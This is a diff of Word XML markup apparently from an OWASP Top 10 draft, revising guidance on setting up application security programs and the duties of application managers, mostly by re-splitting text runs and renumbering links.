-              <w:t xml:space="preserve"> for natural opportunities to gather security information and feed it back into your process.</w:t>
+              <w:t>Yo</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ur approach to application security testing must be highly compatible with the people, processes, and tools you use in your software development lifecycle (SDLC). Attempts to force extra steps, gates, and reviews are likely to cause friction, get bypassed,</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> and struggle to scale. Look for natural opportunities to gather security information and feed it back into your process.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12379,7 +12353,7 @@
             <w:r>
               <w:t xml:space="preserve">Choose the simplest, fastest, most accurate technique to verify each requirement. The </w:t>
             </w:r>
-            <w:hyperlink r:id="rId189">
+            <w:hyperlink r:id="rId188">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12390,7 +12364,7 @@
             <w:r>
               <w:t xml:space="preserve"> and </w:t>
             </w:r>
-            <w:hyperlink r:id="rId190">
+            <w:hyperlink r:id="rId189">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12399,10 +12373,10 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve"> can be great sources of functional and non-functional security requirements in you</w:t>
-            </w:r>
-            <w:r>
-              <w:t>r unit and integration testing. Be sure to consider the human resources required to deal with false positives from the use of automated tooling, as well as the serious dangers of false negatives.</w:t>
+              <w:t xml:space="preserve"> can be great sources of functional and non-functional </w:t>
+            </w:r>
+            <w:r>
+              <w:t>security requirements in your unit and integration testing. Be sure to consider the human resources required to deal with false positives from the use of automated tooling, as well as the serious dangers of false negatives.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12430,13 +12404,13 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>No matter how good you are at testi</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">ng, it won't make any difference unless you communicate it effectively. Build trust by showing you understand how the application works. Describe clearly how it can be abused without "lingo" and include an attack scenario to make it real. Make a realistic </w:t>
-            </w:r>
-            <w:r>
-              <w:t>estimation of how hard the vulnerability is to discover and exploit, and how bad that would be. Finally, deliver findings in the tools development teams are already using, not PDF files.</w:t>
+              <w:t>No matt</w:t>
+            </w:r>
+            <w:r>
+              <w:t>er how good you are at testing, it won't make any difference unless you communicate it effectively. Build trust by showing you understand how the application works. Describe clearly how it can be abused without "lingo" and include an attack scenario to mak</w:t>
+            </w:r>
+            <w:r>
+              <w:t>e it real. Make a realistic estimation of how hard the vulnerability is to discover and exploit, and how bad that would be. Finally, deliver findings in the tools development teams are already using, not PDF files.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12447,7 +12421,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="116" w:name="o-whats-next-for-organizations"/>
-      <w:bookmarkStart w:id="117" w:name="_Toc496719117"/>
+      <w:bookmarkStart w:id="117" w:name="_Toc496914310"/>
       <w:bookmarkEnd w:id="116"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -12462,10 +12436,10 @@
       <w:bookmarkStart w:id="118" w:name="start-your-application-security-program-"/>
       <w:bookmarkEnd w:id="118"/>
       <w:r>
-        <w:t>Start Your Application Security Pro</w:t>
-      </w:r>
-      <w:r>
-        <w:t>gram Now</w:t>
+        <w:t>Start Y</w:t>
+      </w:r>
+      <w:r>
+        <w:t>our Application Security Program Now</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12473,10 +12447,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.</w:t>
+        <w:t>Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the stag</w:t>
+      </w:r>
+      <w:r>
+        <w:t>gering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12484,16 +12458,16 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>OWASP recommends organizations establish an application security program to gain insight and improve securit</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y across their app and API portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, business, and executive management. Security should be v</w:t>
-      </w:r>
-      <w:r>
-        <w:t>isible and measurable, so that all the different players can see and understand the organization's application security posture. Focus on the activities and outcomes that actually help improve enterprise security by eliminating or reducing risk. Key activi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ties include:</w:t>
+        <w:t>OWASP recommends organizations establish an application security program to gain</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> insight and improve security across their app and API portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, business, and executive mana</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">gement. Security should be visible and measurable, so that all the different players can see and understand the organization's application security posture. Focus on the activities and outcomes that actually help improve enterprise security by eliminating </w:t>
+      </w:r>
+      <w:r>
+        <w:t>or reducing risk. Key activities include:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12529,19 +12503,42 @@
       <w:r>
         <w:t xml:space="preserve">Establish an </w:t>
       </w:r>
+      <w:hyperlink r:id="rId190">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>application security program</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> and drive adoption.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="58"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Conduct a </w:t>
+      </w:r>
       <w:hyperlink r:id="rId191">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>application security program</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>and drive adoption.</w:t>
+          <w:t>capability gap analysis</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> comparing your organization to your peers to define key improvement areas and an execution p</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lan.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12553,35 +12550,9 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Conduct a </w:t>
+        <w:t xml:space="preserve">Gain management approval and establish an </w:t>
       </w:r>
       <w:hyperlink r:id="rId192">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>capability gap analysis</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> comparing your organization to your peers to define key improvement areas and an execution plan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="58"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Gain management approval</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> and establish an </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId193">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -12614,30 +12585,59 @@
       <w:r>
         <w:t xml:space="preserve">Identify the </w:t>
       </w:r>
+      <w:hyperlink r:id="rId193">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>protection needs</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> of your </w:t>
+      </w:r>
       <w:hyperlink r:id="rId194">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>protection needs</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> of your </w:t>
+          <w:t>application portfolio</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>from a business perspective. This should be driven in part by privacy laws and other regulations relevant to the data asset being protected.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="59"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Establish a common </w:t>
       </w:r>
       <w:hyperlink r:id="rId195">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>application portfolio</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> from a business perspective. This should be drive</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n in part by privacy laws and other regulations relevant to the data asset being protected.</w:t>
+          <w:t>risk rating mod</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>el</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12649,21 +12649,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Establish a common </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId196">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>risk rating model</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> with a consistent set of likelihood and impact</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> factors reflective of your organization's tolerance for risk.</w:t>
+        <w:t>Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12675,19 +12661,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="59"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Establish assurance guidelines to properly define coverage and level of rigor required.</w:t>
+        <w:t>Establish assurance guidelines to properly defi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ne coverage and level of rigor required.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12697,10 +12674,7 @@
       <w:bookmarkStart w:id="121" w:name="enable-with-a-strong-foundation"/>
       <w:bookmarkEnd w:id="121"/>
       <w:r>
-        <w:t>Enable w</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ith a Strong Foundation</w:t>
+        <w:t>Enable with a Strong Foundation</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12714,16 +12688,45 @@
       <w:r>
         <w:t xml:space="preserve">Establish a set of focused </w:t>
       </w:r>
+      <w:hyperlink r:id="rId196">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>policies and standards</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> that provide an application security baseline for a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ll development teams to adhere to.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="60"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Define a common set of </w:t>
+      </w:r>
       <w:hyperlink r:id="rId197">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>policies and standards</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> that provide an application security baseline for all development teams to adhere to.</w:t>
+          <w:t>reusable security controls</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> that complement these policies and standards and provide design and development guida</w:t>
+      </w:r>
+      <w:r>
+        <w:t>nce on their use.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12735,35 +12738,9 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Define a commo</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">n set of </w:t>
+        <w:t xml:space="preserve">Establish an </w:t>
       </w:r>
       <w:hyperlink r:id="rId198">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>reusable security controls</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> that complement these policies and standards and provide design and development guidance on their use.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="60"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Establish an </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId199">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -12782,7 +12759,10 @@
       <w:bookmarkStart w:id="122" w:name="integrate-security-into-existing-process"/>
       <w:bookmarkEnd w:id="122"/>
       <w:r>
-        <w:t>Integrate Security into Existing Processes</w:t>
+        <w:t>Integrate Security into Exis</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ting Processes</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12796,85 +12776,92 @@
       <w:r>
         <w:t xml:space="preserve">Define and integrate </w:t>
       </w:r>
+      <w:hyperlink r:id="rId199">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>secure implementation</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
       <w:hyperlink r:id="rId200">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>secure implementation</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
+          <w:t>verification</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> activities into existing development an</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">d operational processes. Activities include </w:t>
       </w:r>
       <w:hyperlink r:id="rId201">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>verification</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> activities into existing development and operational processes. Activities include </w:t>
+          <w:t>threat modeling</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">, secure </w:t>
       </w:r>
       <w:hyperlink r:id="rId202">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>threat modeling</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">, secure </w:t>
+          <w:t>design &amp; review</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>, secure coding a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">nd </w:t>
       </w:r>
       <w:hyperlink r:id="rId203">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>design &amp; review</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">, secure coding and </w:t>
+          <w:t>code review</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:hyperlink r:id="rId204">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>code review</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
+          <w:t>penetration testing</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>, and remediation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="61"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Provide subject matter experts and </w:t>
       </w:r>
       <w:hyperlink r:id="rId205">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>penetration testing</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>, and remediation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="61"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Provide subject matter experts and </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId206">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -12893,7 +12880,6 @@
       <w:bookmarkStart w:id="123" w:name="provide-management-visibility"/>
       <w:bookmarkEnd w:id="123"/>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Provide Management Visibility</w:t>
       </w:r>
     </w:p>
@@ -12906,10 +12892,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
+        <w:t>Manage with metrics. Drive improvement and funding decisions based on the metrics and an</w:t>
+      </w:r>
+      <w:r>
+        <w:t>alysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12921,10 +12907,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Analyze data from the implementation and verification activities to look for root cause and vul</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nerability patterns to drive strategic and systemic improvements across the enterprise. Learn from mistakes and offer positive incentives to promote improvements.</w:t>
+        <w:t>Analyze data from the implementation and verif</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ication activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. Learn from mistakes and offer positive incentives to promote improvements.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12946,9 +12932,12 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">US Department of Veteran's Affairs </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId207">
+        <w:t>US Department of V</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">eteran's Affairs </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId206">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -12962,7 +12951,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="125" w:name="a-whats-next-for-application-managers"/>
-      <w:bookmarkStart w:id="126" w:name="_Toc496719118"/>
+      <w:bookmarkStart w:id="126" w:name="_Toc496914311"/>
       <w:bookmarkEnd w:id="125"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -12985,7 +12974,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Applications are some of the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application. </w:t>
+        <w:t>Applications are some of the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12993,13 +12982,13 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>We suggest establishing appl</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ication owners and application managers for every application to provide accountability, responsibility, consulted and informed (RACI). The application manager is the technical counterpart of the application owner from business perspective and manages the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>full application lifecycle, including the security of an application, associate data assets, and documentation. This can help with understanding who can sign off risks, who is responsible for including security.</w:t>
+        <w:t>We suggest establishing appli</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cation owners and application managers for every application to provide accountability, responsibility, consulted and informed (RACI), to ensure the organization who can sign off risks, and who is responsible for security design, building, testing and depl</w:t>
+      </w:r>
+      <w:r>
+        <w:t>oying application security.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13021,7 +13010,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Collect and negotiate the business requirements for an application with the business, including receiving the protection requirements in regard to confidentiality, integrity and availability of all data assets</w:t>
+        <w:t>Collect and negotiate the business requirements for an application with the business, including receiving the protection requirements in regard to confidentiality, integrity and availability of all data assets.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13033,10 +13022,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Compile the technical requirements including f</w:t>
-      </w:r>
-      <w:r>
-        <w:t>unctional and non functional security requirements</w:t>
+        <w:t xml:space="preserve">Compile the technical requirements including </w:t>
+      </w:r>
+      <w:r>
+        <w:t>functional and non functional security requirements.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13048,7 +13037,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Plan and negotiate the budget that covers all aspects of design, build, testing and operation, including security activities</w:t>
+        <w:t>Plan and negotiate the budget that covers all aspects of design, build, testing and operation, including security activities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13070,10 +13059,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Negotiate with internal or external </w:t>
-      </w:r>
-      <w:r>
-        <w:t>developers the requirements, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices</w:t>
+        <w:t>Negotiate with internal or extern</w:t>
+      </w:r>
+      <w:r>
+        <w:t>al developers the requirements, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13085,7 +13074,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Rate the fulfillment of all technical requirements including a rough planning and design</w:t>
+        <w:t>Rate the fulfillment of all technical requirements including a rough planning and design phase.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13097,10 +13086,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Negotiate all technical re</w:t>
-      </w:r>
-      <w:r>
-        <w:t>quirements including design, security and service level agreements (SLA)</w:t>
+        <w:t>Negotiate all t</w:t>
+      </w:r>
+      <w:r>
+        <w:t>echnical requirements including design, security and service level agreements (SLA).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13114,7 +13103,7 @@
       <w:r>
         <w:t xml:space="preserve">Adopt templates and checklists, such as </w:t>
       </w:r>
-      <w:hyperlink r:id="rId208">
+      <w:hyperlink r:id="rId207">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -13123,19 +13112,24 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>NB</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: The Annex is a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> sample specific to US contract law, and is likely to need legal review in your jurisdiction. Please consult qualified legal advice before using the Annex.</w:t>
+        <w:t>NB: P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>lease note that the Annex is a sample specific to US contract law, and is likely to need legal review in your jurisdiction. Please consult qualified legal advice before using the Annex.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13150,6 +13144,17 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>To ensure applications have a secure design, the f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ollowing should be performed:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -13157,10 +13162,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Negotiate planning and design with the developers and internal shareholders, e.g</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. security specialists</w:t>
+        <w:t>Negotiate planning and design with the developers and internal shareholders, e.g. security specialists</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13172,7 +13174,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Define a security architecture, controls, and countermeasures according the protection needs and the planned environmental security level. This should be supported by security specialists.</w:t>
+        <w:t>Define a security architecture, controls, and countermeasures according to the protection needs and the planned environment</w:t>
+      </w:r>
+      <w:r>
+        <w:t>al security level. This should be supported by security specialists.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13184,10 +13189,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Get the application owner to assume remainin</w:t>
-      </w:r>
-      <w:r>
-        <w:t>g risks or to provide additional resources.</w:t>
+        <w:t>Get the application owner to assume remaining risks or to provide additional resources.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13199,17 +13201,28 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Each sprint, ensure security stories are created for functional requirements, and constraints added for non-functional requirements</w:t>
+        <w:t>Each sprint, ensure security stories are created for functional requirements, and constraints added</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> for non-functional requirements.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="131" w:name="development"/>
+      <w:bookmarkStart w:id="131" w:name="deployment-testing-and-rollout"/>
       <w:bookmarkEnd w:id="131"/>
       <w:r>
-        <w:t>Development</w:t>
+        <w:t>Deployment, Testing and Rollout</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>To ensure secure operations and changes, the following should be performed:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13221,20 +13234,87 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Please review the +D "What's next for developers" for guidance.</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Automate the secure setup of the application, interfaces and of all components needed, including required authoriz</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ations.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Test the technical functions and integration with the IT architecture and coordinate business tests.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Create "use" and "abuse" test cases from technical and business perspectives.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Manage security tests according to internal processes, the protection</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> needs and the level of security required by the application.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Put the application in operation and migrate from previously used applications if needed.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>Finalize all documentation, including the CMDB and security architecture.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
